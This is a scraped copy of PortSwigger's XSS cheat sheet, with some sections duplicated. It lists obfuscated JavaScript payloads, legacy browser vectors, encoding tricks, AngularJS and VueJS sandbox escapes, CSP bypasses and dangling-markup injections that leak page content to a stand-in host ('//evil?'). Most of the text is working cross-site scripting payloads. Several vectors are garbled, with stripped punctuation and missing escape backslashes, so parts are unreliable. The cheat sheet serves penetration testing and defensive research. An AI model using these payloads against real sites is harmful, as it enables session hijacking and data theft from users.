parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string: Hieroglyphy/JSFuck (frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs

Title: Basic context: WAF blocks <[a-zA-Z]
Description: This lab captures the scenario where you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A
Closest vector: N/A

Title: Script based injection, but quotes, forward slash and backslash are escaped
Description: We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A
Closest vector: N/A

Title: innerHTML context but no equals allowed
Description: You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A
Closest vector: N/A

Title: Basic context length limit
Description: This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q oncut=alert``, but can you beat it?
Length limit: 15
Closest vector: <q oncut=alert``

Title: Attribute context length limit
Description: The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14
Closest vector: oncut=alert``

Title: Basic context length limit, arbitrary code
Description: It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19
Closest vector: <q/oncut=eval(name)

Title: Attribute context length limit, arbitrary code
Description: Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17
Closest vector: See link

Title: Injection occurs inside a frameset but before the body
Description: We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A
Closest vector: N/A

Title: Injection occurs inside a single quoted string; only the characters a-z0-9+` are allowed
Description: The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A
Closest vector: N/A

Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src=javascript:alert(1)>
Body background with JavaScript protocol
<body background=javascript:alert(1)>
Iframe data URLs no longer work, as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol (used to work in IE)
<a href=vbscript:MsgBox+1>XSS</a>
<a href=# onclick="vbs:Msgbox+1">XSS</a>
<a href=# onclick="VBS:Msgbox+1">XSS</a>
<a href=# onclick="vbscript:Msgbox+1">XSS</a>
<a href=# onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href=# language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href=# onclick="jscript.compact:alert(1)">test</a>
<a href=# onclick="JSCRIPT.COMPACT:alert(1)">test</a>
JScript.Encode allows encoded JavaScript
<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+D`8mgIAAA==^#~@">XSS</a>
<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+D`8mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript
<iframe onload="VBScript.Encode:#@~^CAAAAA==ko$K6FoQIAAA==^#~@">
<iframe language="VBScript.Encode" onload="#@~^CAAAAA==ko$K6FoQIAAA==^#~@">
JavaScript entities (used to work in Netscape Navigator)
<a title="&{alert(1)}">XSS</a>
JavaScript stylesheets (used to be supported by Netscape Navigator)
<link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL (Firefox only, <= 2)
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,3C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3Cbinding3E3Cbindings3E)">
CSS expressions (<= IE7)
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of :
<div style="xss=expression(alert(1))">
<div style="color&#x3d;red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script> function window.onload(){ alert(1) } </script>
<script> function window::onload(){ alert(1) } </script>
<script> function window.location(){} </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
<body> <script> function document.body.innerHTML(){ x = '<img src=1 onerror=alert(1)>' } </script> </body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after &#
<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities
<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src=evil
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction=evil
Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>
Isindex and action
<isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.
Script based injection but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block.
The closest we've got to solving this is when you have multiple injection points, the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.
innerHTML context but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.
Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q oncut=alert``, but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``
Attribute context, length limit
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert``
Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q oncut=eval(name)
Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link.
Injection occurs inside a frameset but before the body
We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.
Injection occurs inside a single quoted string, only the characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.
Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src=javascript:alert(1)>
Body background with JavaScript protocol
<body background=javascript:alert(1)>
Iframe data URLs no longer work as modern browsers use a null origin
<iframe src=data:text/html,<img src=1 onerror=alert(document.domain)>>
VBScript protocol used to work in IE
<a href=vbscript:MsgBox+1>XSS</a>
<a href='' onclick=vbs:Msgbox+1>XSS</a>
<a href='' onclick=VBS:Msgbox+1>XSS</a>
<a href='' onclick=vbscript:Msgbox+1>XSS</a>
<a href='' onclick=VBSCRIPT:Msgbox+1>XSS</a>
<a href='' language=vbs onclick=vbscript:Msgbox+1>XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href='' onclick=jscript.compact:alert(1)>test</a>
<a href='' onclick=JSCRIPT.COMPACT:alert(1)>test</a>
JScript.Encode allows encoded JavaScript
<a href='' language=JScript.Encode onclick=~^CAAAAA==C^+D`8mgIAAA==^~>XSS</a>
<a href='' onclick=JScript.Encode:~^CAAAAA==C^+D`8mgIAAA==^~>XSS</a>
VBScript.Encode allows encoded VBScript
<iframe onload=VBScript.Encode:~^CAAAAA==ko$K6FoQIAAA==^~>
<iframe language=VBScript.Encode onload=~^CAAAAA==ko$K6FoQIAAA==^~>
JavaScript entities used to work in Netscape Navigator
<a title='&{alert(1)}'>XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator
<link href=xss.js rel=stylesheet type=text/javascript>
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2
<div style=-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>
<div style=-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>
<div style=-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>
XBL also worked in FF3.5 using data URLs
<img src=blah style=-moz-binding:url(data:text/xml;charset=utf-8,3C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E)>
CSS expressions, <= IE7
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))>
<div style=color&#x3d;red>test</div>
Behaviors for older modes of IE
<a style=behavior:url(#default#AnchorClick) folder=javascript:alert(1)>XSS</a>
Older versions of IE supported event handlers in functions
<script> function window.onload() { alert(1) } </script>
<script> function window.location() { } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() { } </script> <body>
<script> function document.body.innerHTML() { x = "<img src=1 onerror=alert(1)>" } </script> <body>
GreyMagic HTML+time exploit (no longer works even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after &
<a href="javascript&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities
<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src=//evil?
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil?
Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>
Isindex and action
<isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
Set window.name via target attribute in a <base> tag
<base target=alert(1)><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27eval(name)">XSS via target in base tag</a>
Set window.name via target attribute in an <a> tag
<a target=alert(1) href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27eval(name)">XSS via target in a tag</a>
Set window.name via usemap attribute in an <img> tag
<img src=validimage.png width=10 height=10 usemap=#xss><map name=xss><area shape=rect coords=0,0,82,126 target=alert(1) href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27eval(name)"></map>
Set window.name via target attribute in a <form> tag
<form action=http://subdomain1.portswigger-labs.net/xss/xss.php target=alert(1)><input type=hidden name=x value="'eval(name)"><input type=hidden name=context value=js_string_single><input type=submit value="XSS via target in a form"></form>
Set window.name via formtarget attribute in an <input> tag, type submit
<form><input type=hidden name=x value="'eval(name)"><input type=hidden name=context value=js_string_single><input type=submit formaction=http://subdomain1.portswigger-labs.net/xss/xss.php formtarget=alert(1) value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in an <input> tag, type image
<form><input type=hidden name=x value="'eval(name)"><input type=hidden name=context value=js_string_single><input name=1 type=image src=validimage.png formaction=http://subdomain1.portswigger-labs.net/xss/xss.php formtarget=alert(1) value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain
<meta http-equiv=refresh content="0; url=//portswigger-labs.net">
Meta charset attribute UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>
Disable referer
<meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8
\xC0\xBCscript>alert(1)</script>
\xE0\x80\xBCscript>alert(1)</script>
\xF0\x80\x80\xBCscript>alert(1)</script>
\xF8\x80\x80\x80\xBCscript>alert(1)</script>
\xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>
Unicode escapes
<script>\u0061lert(1)</script>
Unicode escapes, ES6 style
<script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes
<script>eval('\x61lert(1)')</script>
Octal encoding
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon
<a href="&#106avascript:alert(1)">XSS</a>
<a href="&#106;avascript:alert(1)">XSS</a>
SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros
<a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9
<a href="j&#x61vascript:alert(1)">XSS</a>
<a href="&#x6a avascript:alert(1)">XSS</a>
Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities
<a href="javascript&colon;alert(1)">XSS</a>
<a href="java&Tab;script:alert(1)">XSS</a>
<a href="java&NewLine;script:alert(1)">XSS</a>
<a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
Obfuscation
Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64 and HTML entities
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
Data protocol inside script src with base64 and URL encoding
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
Iframe srcdoc HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?
Link href stylesheet
<link rel=stylesheet href="//evil?
Link href icon
<link rel=icon href="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute
<img src="//evil?
<image src="//evil?
Video using track element
<video><track default src="//evil?
Video using source element and src attribute
